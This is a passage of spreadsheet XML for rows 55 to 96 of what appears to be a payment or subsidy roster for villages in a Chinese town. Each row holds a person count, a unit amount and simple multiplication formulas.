        <v>239</v>
      </c>
      <c r="F55" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G55" s="17">
        <v>2</v>
      </c>
      <c r="H55" s="18">
        <v>325</v>
      </c>
      <c r="I55" s="17">
        <f>H55*G55</f>
        <v>650</v>
      </c>
      <c r="J55" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K55" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="1:11">
      <c r="A56" s="16" t="s">
        <v>377</v>
      </c>
      <c r="B56" s="17" t="str">
        <f>B55</f>
        <v>城关镇</v>
      </c>
      <c r="C56" s="17" t="str">
        <f>C55</f>
        <v>中华村</v>
      </c>
      <c r="D56" s="16" t="s">
        <v>378</v>
      </c>
      <c r="E56" s="16" t="s">
        <v>379</v>
      </c>
      <c r="F56" s="17" t="str">
        <f>F55</f>
        <v>4113210108</v>
      </c>
      <c r="G56" s="17"/>
      <c r="H56" s="17"/>
      <c r="I56" s="17"/>
      <c r="J56" s="17"/>
      <c r="K56" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="1:11">
      <c r="A57" s="16" t="s">
        <v>380</v>
      </c>
      <c r="B57" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C57" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D57" s="17" t="s">
        <v>381</v>
      </c>
      <c r="E57" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F57" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G57" s="17">
        <v>1</v>
      </c>
      <c r="H57" s="18">
        <v>365</v>
      </c>
      <c r="I57" s="17">
        <f>H57*G57</f>
        <v>365</v>
      </c>
      <c r="J57" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K57" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="1:11">
      <c r="A58" s="16" t="s">
        <v>383</v>
      </c>
      <c r="B58" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C58" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D58" s="17" t="s">
        <v>384</v>
      </c>
      <c r="E58" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F58" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G58" s="17">
        <v>1</v>
      </c>
      <c r="H58" s="18">
        <v>365</v>
      </c>
      <c r="I58" s="17">
        <f>H58*G58</f>
        <v>365</v>
      </c>
      <c r="J58" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K58" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="1:11">
      <c r="A59" s="16" t="s">
        <v>385</v>
      </c>
      <c r="B59" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C59" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D59" s="17" t="s">
        <v>386</v>
      </c>
      <c r="E59" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F59" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G59" s="17">
        <v>2</v>
      </c>
      <c r="H59" s="18">
        <v>325</v>
      </c>
      <c r="I59" s="17">
        <f>H59*G59</f>
        <v>650</v>
      </c>
      <c r="J59" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K59" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="1:11">
      <c r="A60" s="16" t="s">
        <v>387</v>
      </c>
      <c r="B60" s="17" t="str">
        <f>B59</f>
        <v>城关镇</v>
      </c>
      <c r="C60" s="17" t="str">
        <f>C59</f>
        <v>西北村</v>
      </c>
      <c r="D60" s="16" t="s">
        <v>388</v>
      </c>
      <c r="E60" s="16" t="s">
        <v>389</v>
      </c>
      <c r="F60" s="17" t="str">
        <f>F59</f>
        <v>4113210106</v>
      </c>
      <c r="G60" s="17"/>
      <c r="H60" s="17"/>
      <c r="I60" s="17"/>
      <c r="J60" s="17"/>
      <c r="K60" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="61" customHeight="1" spans="1:11">
      <c r="A61" s="16" t="s">
        <v>390</v>
      </c>
      <c r="B61" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C61" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D61" s="17" t="s">
        <v>391</v>
      </c>
      <c r="E61" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F61" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G61" s="17">
        <v>2</v>
      </c>
      <c r="H61" s="18">
        <v>325</v>
      </c>
      <c r="I61" s="17">
        <f>H61*G61</f>
        <v>650</v>
      </c>
      <c r="J61" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K61" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="1:11">
      <c r="A62" s="16" t="s">
        <v>392</v>
      </c>
      <c r="B62" s="17" t="str">
        <f>B61</f>
        <v>城关镇</v>
      </c>
      <c r="C62" s="17" t="str">
        <f>C61</f>
        <v>北外村</v>
      </c>
      <c r="D62" s="16" t="s">
        <v>393</v>
      </c>
      <c r="E62" s="16" t="s">
        <v>394</v>
      </c>
      <c r="F62" s="17" t="str">
        <f>F61</f>
        <v>4113210102</v>
      </c>
      <c r="G62" s="17"/>
      <c r="H62" s="17"/>
      <c r="I62" s="17"/>
      <c r="J62" s="17"/>
      <c r="K62" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="1:11">
      <c r="A63" s="16" t="s">
        <v>395</v>
      </c>
      <c r="B63" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C63" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D63" s="17" t="s">
        <v>396</v>
      </c>
      <c r="E63" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F63" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G63" s="17">
        <v>2</v>
      </c>
      <c r="H63" s="18">
        <v>325</v>
      </c>
      <c r="I63" s="17">
        <f>H63*G63</f>
        <v>650</v>
      </c>
      <c r="J63" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K63" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="1:11">
      <c r="A64" s="16" t="s">
        <v>398</v>
      </c>
      <c r="B64" s="17" t="str">
        <f>B63</f>
        <v>城关镇</v>
      </c>
      <c r="C64" s="17" t="str">
        <f>C63</f>
        <v>东北六组</v>
      </c>
      <c r="D64" s="16" t="s">
        <v>399</v>
      </c>
      <c r="E64" s="16" t="s">
        <v>288</v>
      </c>
      <c r="F64" s="17" t="str">
        <f>F63</f>
        <v>4113210103</v>
      </c>
      <c r="G64" s="17"/>
      <c r="H64" s="17"/>
      <c r="I64" s="17"/>
      <c r="J64" s="17"/>
      <c r="K64" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="1:11">
      <c r="A65" s="16" t="s">
        <v>400</v>
      </c>
      <c r="B65" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D65" s="17" t="s">
        <v>401</v>
      </c>
      <c r="E65" s="17" t="s">
        <v>402</v>
      </c>
      <c r="F65" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G65" s="17">
        <v>1</v>
      </c>
      <c r="H65" s="18">
        <v>365</v>
      </c>
      <c r="I65" s="17">
        <f>H65*G65</f>
        <v>365</v>
      </c>
      <c r="J65" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K65" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="1:11">
      <c r="A66" s="16" t="s">
        <v>403</v>
      </c>
      <c r="B66" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C66" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D66" s="17" t="s">
        <v>404</v>
      </c>
      <c r="E66" s="17" t="s">
        <v>405</v>
      </c>
      <c r="F66" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G66" s="17">
        <v>2</v>
      </c>
      <c r="H66" s="18">
        <v>325</v>
      </c>
      <c r="I66" s="17">
        <f>H66*G66</f>
        <v>650</v>
      </c>
      <c r="J66" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K66" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="1:11">
      <c r="A67" s="16" t="s">
        <v>406</v>
      </c>
      <c r="B67" s="17" t="str">
        <f>B66</f>
        <v>城关镇</v>
      </c>
      <c r="C67" s="17" t="str">
        <f>C66</f>
        <v>中华村</v>
      </c>
      <c r="D67" s="16" t="s">
        <v>407</v>
      </c>
      <c r="E67" s="16" t="s">
        <v>408</v>
      </c>
      <c r="F67" s="17" t="str">
        <f>F66</f>
        <v>4113210108</v>
      </c>
      <c r="G67" s="17"/>
      <c r="H67" s="17"/>
      <c r="I67" s="17"/>
      <c r="J67" s="17"/>
      <c r="K67" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="1:11">
      <c r="A68" s="16" t="s">
        <v>409</v>
      </c>
      <c r="B68" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C68" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D68" s="17" t="s">
        <v>410</v>
      </c>
      <c r="E68" s="17" t="s">
        <v>411</v>
      </c>
      <c r="F68" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G68" s="17">
        <v>1</v>
      </c>
      <c r="H68" s="18">
        <v>365</v>
      </c>
      <c r="I68" s="17">
        <f>H68*G68</f>
        <v>365</v>
      </c>
      <c r="J68" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K68" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="1:11">
      <c r="A69" s="16" t="s">
        <v>412</v>
      </c>
      <c r="B69" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C69" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D69" s="17" t="s">
        <v>413</v>
      </c>
      <c r="E69" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F69" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G69" s="17">
        <v>2</v>
      </c>
      <c r="H69" s="18">
        <v>325</v>
      </c>
      <c r="I69" s="17">
        <f>H69*G69</f>
        <v>650</v>
      </c>
      <c r="J69" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K69" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="1:11">
      <c r="A70" s="16" t="s">
        <v>414</v>
      </c>
      <c r="B70" s="17" t="str">
        <f>B69</f>
        <v>城关镇</v>
      </c>
      <c r="C70" s="17" t="str">
        <f>C69</f>
        <v>中华村</v>
      </c>
      <c r="D70" s="16" t="s">
        <v>415</v>
      </c>
      <c r="E70" s="16" t="s">
        <v>416</v>
      </c>
      <c r="F70" s="17" t="str">
        <f>F69</f>
        <v>4113210108</v>
      </c>
      <c r="G70" s="17"/>
      <c r="H70" s="17"/>
      <c r="I70" s="17"/>
      <c r="J70" s="17"/>
      <c r="K70" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="1:11">
      <c r="A71" s="16" t="s">
        <v>417</v>
      </c>
      <c r="B71" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D71" s="17" t="s">
        <v>418</v>
      </c>
      <c r="E71" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F71" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G71" s="17">
        <v>1</v>
      </c>
      <c r="H71" s="18">
        <v>365</v>
      </c>
      <c r="I71" s="17">
        <f t="shared" ref="I71:I90" si="1">H71*G71</f>
        <v>365</v>
      </c>
      <c r="J71" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K71" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="1:11">
      <c r="A72" s="16" t="s">
        <v>419</v>
      </c>
      <c r="B72" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C72" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D72" s="17" t="s">
        <v>420</v>
      </c>
      <c r="E72" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F72" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G72" s="17">
        <v>1</v>
      </c>
      <c r="H72" s="18">
        <v>365</v>
      </c>
      <c r="I72" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J72" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K72" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="1:11">
      <c r="A73" s="16" t="s">
        <v>421</v>
      </c>
      <c r="B73" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C73" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D73" s="17" t="s">
        <v>422</v>
      </c>
      <c r="E73" s="17" t="s">
        <v>416</v>
      </c>
      <c r="F73" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G73" s="17">
        <v>1</v>
      </c>
      <c r="H73" s="18">
        <v>365</v>
      </c>
      <c r="I73" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J73" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K73" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="1:11">
      <c r="A74" s="16" t="s">
        <v>423</v>
      </c>
      <c r="B74" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C74" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D74" s="17" t="s">
        <v>424</v>
      </c>
      <c r="E74" s="17" t="s">
        <v>425</v>
      </c>
      <c r="F74" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G74" s="17">
        <v>1</v>
      </c>
      <c r="H74" s="18">
        <v>365</v>
      </c>
      <c r="I74" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J74" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K74" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="1:11">
      <c r="A75" s="16" t="s">
        <v>426</v>
      </c>
      <c r="B75" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C75" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D75" s="17" t="s">
        <v>427</v>
      </c>
      <c r="E75" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F75" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G75" s="17">
        <v>1</v>
      </c>
      <c r="H75" s="18">
        <v>365</v>
      </c>
      <c r="I75" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J75" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K75" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="76" customHeight="1" spans="1:11">
      <c r="A76" s="16" t="s">
        <v>428</v>
      </c>
      <c r="B76" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C76" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D76" s="17" t="s">
        <v>429</v>
      </c>
      <c r="E76" s="17" t="s">
        <v>405</v>
      </c>
      <c r="F76" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G76" s="17">
        <v>1</v>
      </c>
      <c r="H76" s="18">
        <v>365</v>
      </c>
      <c r="I76" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J76" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K76" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="1:11">
      <c r="A77" s="16" t="s">
        <v>430</v>
      </c>
      <c r="B77" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C77" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D77" s="17" t="s">
        <v>431</v>
      </c>
      <c r="E77" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F77" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G77" s="17">
        <v>1</v>
      </c>
      <c r="H77" s="18">
        <v>365</v>
      </c>
      <c r="I77" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J77" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K77" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="1:11">
      <c r="A78" s="16" t="s">
        <v>433</v>
      </c>
      <c r="B78" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C78" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D78" s="17" t="s">
        <v>434</v>
      </c>
      <c r="E78" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F78" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G78" s="17">
        <v>1</v>
      </c>
      <c r="H78" s="17">
        <v>420</v>
      </c>
      <c r="I78" s="17">
        <f t="shared" si="1"/>
        <v>420</v>
      </c>
      <c r="J78" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K78" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="1:11">
      <c r="A79" s="16" t="s">
        <v>436</v>
      </c>
      <c r="B79" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D79" s="17" t="s">
        <v>437</v>
      </c>
      <c r="E79" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F79" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G79" s="17">
        <v>1</v>
      </c>
      <c r="H79" s="18">
        <v>365</v>
      </c>
      <c r="I79" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J79" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K79" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="1:11">
      <c r="A80" s="16" t="s">
        <v>438</v>
      </c>
      <c r="B80" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C80" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D80" s="17" t="s">
        <v>439</v>
      </c>
      <c r="E80" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F80" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G80" s="17">
        <v>1</v>
      </c>
      <c r="H80" s="18">
        <v>365</v>
      </c>
      <c r="I80" s="17">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J80" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K80" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="1:11">
      <c r="A81" s="16" t="s">
        <v>440</v>
      </c>
      <c r="B81" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C81" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D81" s="17" t="s">
        <v>441</v>
      </c>
      <c r="E81" s="17" t="s">
        <v>442</v>
      </c>
      <c r="F81" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G81" s="17">
        <v>2</v>
      </c>
      <c r="H81" s="18">
        <v>325</v>
      </c>
      <c r="I81" s="17">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J81" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K81" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="1:11">
      <c r="A82" s="16" t="s">
        <v>443</v>
      </c>
      <c r="B82" s="17" t="str">
        <f>B81</f>
        <v>城关镇</v>
      </c>
      <c r="C82" s="17" t="str">
        <f>C81</f>
        <v>北外村</v>
      </c>
      <c r="D82" s="16" t="s">
        <v>444</v>
      </c>
      <c r="E82" s="16" t="s">
        <v>445</v>
      </c>
      <c r="F82" s="17" t="str">
        <f>F81</f>
        <v>4113210102</v>
      </c>
      <c r="G82" s="17"/>
      <c r="H82" s="17"/>
      <c r="I82" s="17"/>
      <c r="J82" s="17"/>
      <c r="K82" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="1:11">
      <c r="A83" s="16" t="s">
        <v>446</v>
      </c>
      <c r="B83" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C83" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D83" s="17" t="s">
        <v>447</v>
      </c>
      <c r="E83" s="17" t="s">
        <v>448</v>
      </c>
      <c r="F83" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G83" s="17">
        <v>1</v>
      </c>
      <c r="H83" s="18">
        <v>365</v>
      </c>
      <c r="I83" s="17">
        <f t="shared" ref="I83:I89" si="2">H83*G83</f>
        <v>365</v>
      </c>
      <c r="J83" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K83" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="1:11">
      <c r="A84" s="16" t="s">
        <v>449</v>
      </c>
      <c r="B84" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C84" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D84" s="17" t="s">
        <v>450</v>
      </c>
      <c r="E84" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F84" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G84" s="17">
        <v>1</v>
      </c>
      <c r="H84" s="18">
        <v>365</v>
      </c>
      <c r="I84" s="17">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J84" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K84" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="1:11">
      <c r="A85" s="16" t="s">
        <v>451</v>
      </c>
      <c r="B85" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C85" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D85" s="17" t="s">
        <v>452</v>
      </c>
      <c r="E85" s="17" t="s">
        <v>453</v>
      </c>
      <c r="F85" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G85" s="17">
        <v>1</v>
      </c>
      <c r="H85" s="18">
        <v>365</v>
      </c>
      <c r="I85" s="17">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J85" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K85" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="1:11">
      <c r="A86" s="16" t="s">
        <v>454</v>
      </c>
      <c r="B86" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C86" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D86" s="17" t="s">
        <v>455</v>
      </c>
      <c r="E86" s="17" t="s">
        <v>456</v>
      </c>
      <c r="F86" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G86" s="17">
        <v>1</v>
      </c>
      <c r="H86" s="18">
        <v>365</v>
      </c>
      <c r="I86" s="17">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J86" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K86" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="1:11">
      <c r="A87" s="16" t="s">
        <v>457</v>
      </c>
      <c r="B87" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C87" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D87" s="17" t="s">
        <v>458</v>
      </c>
      <c r="E87" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F87" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G87" s="17">
        <v>1</v>
      </c>
      <c r="H87" s="18">
        <v>365</v>
      </c>
      <c r="I87" s="17">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J87" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K87" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="1:11">
      <c r="A88" s="16" t="s">
        <v>459</v>
      </c>
      <c r="B88" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C88" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D88" s="17" t="s">
        <v>460</v>
      </c>
      <c r="E88" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F88" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G88" s="17">
        <v>1</v>
      </c>
      <c r="H88" s="18">
        <v>365</v>
      </c>
      <c r="I88" s="17">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J88" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K88" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="89" customHeight="1" spans="1:11">
      <c r="A89" s="16" t="s">
        <v>461</v>
      </c>
      <c r="B89" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C89" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D89" s="17" t="s">
        <v>462</v>
      </c>
      <c r="E89" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F89" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G89" s="17">
        <v>2</v>
      </c>
      <c r="H89" s="18">
        <v>325</v>
      </c>
      <c r="I89" s="17">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J89" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K89" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="90" customHeight="1" spans="1:11">
      <c r="A90" s="16" t="s">
        <v>463</v>
      </c>
      <c r="B90" s="17" t="str">
        <f>B89</f>
        <v>城关镇</v>
      </c>
      <c r="C90" s="17" t="str">
        <f>C89</f>
        <v>中华村</v>
      </c>
      <c r="D90" s="16" t="s">
        <v>464</v>
      </c>
      <c r="E90" s="16" t="s">
        <v>312</v>
      </c>
      <c r="F90" s="17" t="str">
        <f>F89</f>
        <v>4113210108</v>
      </c>
      <c r="G90" s="17"/>
      <c r="H90" s="17"/>
      <c r="I90" s="17"/>
      <c r="J90" s="17"/>
      <c r="K90" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="1:11">
      <c r="A91" s="16" t="s">
        <v>465</v>
      </c>
      <c r="B91" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C91" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D91" s="17" t="s">
        <v>466</v>
      </c>
      <c r="E91" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F91" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G91" s="17">
        <v>2</v>
      </c>
      <c r="H91" s="18">
        <v>325</v>
      </c>
      <c r="I91" s="17">
        <f>H91*G91</f>
        <v>650</v>
      </c>
      <c r="J91" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K91" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="1:11">
      <c r="A92" s="16" t="s">
        <v>467</v>
      </c>
      <c r="B92" s="17" t="str">
        <f>B91</f>
        <v>城关镇</v>
      </c>
      <c r="C92" s="17" t="str">
        <f>C91</f>
        <v>东北六组</v>
      </c>
      <c r="D92" s="16" t="s">
        <v>468</v>
      </c>
      <c r="E92" s="16" t="s">
        <v>469</v>
      </c>
      <c r="F92" s="17" t="str">
        <f>F91</f>
        <v>4113210103</v>
      </c>
      <c r="G92" s="17"/>
      <c r="H92" s="17"/>
      <c r="I92" s="17"/>
      <c r="J92" s="17"/>
      <c r="K92" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="1:11">
      <c r="A93" s="16" t="s">
        <v>470</v>
      </c>
      <c r="B93" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C93" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D93" s="17" t="s">
        <v>471</v>
      </c>
      <c r="E93" s="17" t="s">
        <v>312</v>
      </c>
      <c r="F93" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G93" s="17">
        <v>1</v>
      </c>
      <c r="H93" s="18">
        <v>365</v>
      </c>
      <c r="I93" s="17">
        <f>H93*G93</f>
        <v>365</v>
      </c>
      <c r="J93" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K93" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="1:11">
      <c r="A94" s="16" t="s">
        <v>472</v>
      </c>
      <c r="B94" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C94" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D94" s="17" t="s">
        <v>473</v>
      </c>
      <c r="E94" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F94" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G94" s="17">
        <v>2</v>
      </c>
      <c r="H94" s="18">
        <v>355</v>
      </c>
      <c r="I94" s="17">
        <f>H94*G94</f>
        <v>710</v>
      </c>
      <c r="J94" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K94" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="1:11">
      <c r="A95" s="16" t="s">
        <v>474</v>
      </c>
      <c r="B95" s="17" t="str">
        <f>B94</f>
        <v>城关镇</v>
      </c>
      <c r="C95" s="17" t="str">
        <f>C94</f>
        <v>西北村</v>
      </c>
      <c r="D95" s="19" t="s">
        <v>475</v>
      </c>
      <c r="E95" s="19" t="s">
        <v>476</v>
      </c>
      <c r="F95" s="17" t="str">
        <f>F94</f>
        <v>4113210106</v>
      </c>
      <c r="G95" s="17"/>
      <c r="H95" s="17"/>
      <c r="I95" s="17"/>
      <c r="J95" s="17"/>
      <c r="K95" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="1:11">
      <c r="A96" s="16" t="s">
        <v>477</v>
      </c>
      <c r="B96" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C96" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D96" s="17" t="s">
        <v>478</v>
      </c>
      <c r="E96" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F96" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G96" s="17">
        <v>1</v>
      </c>
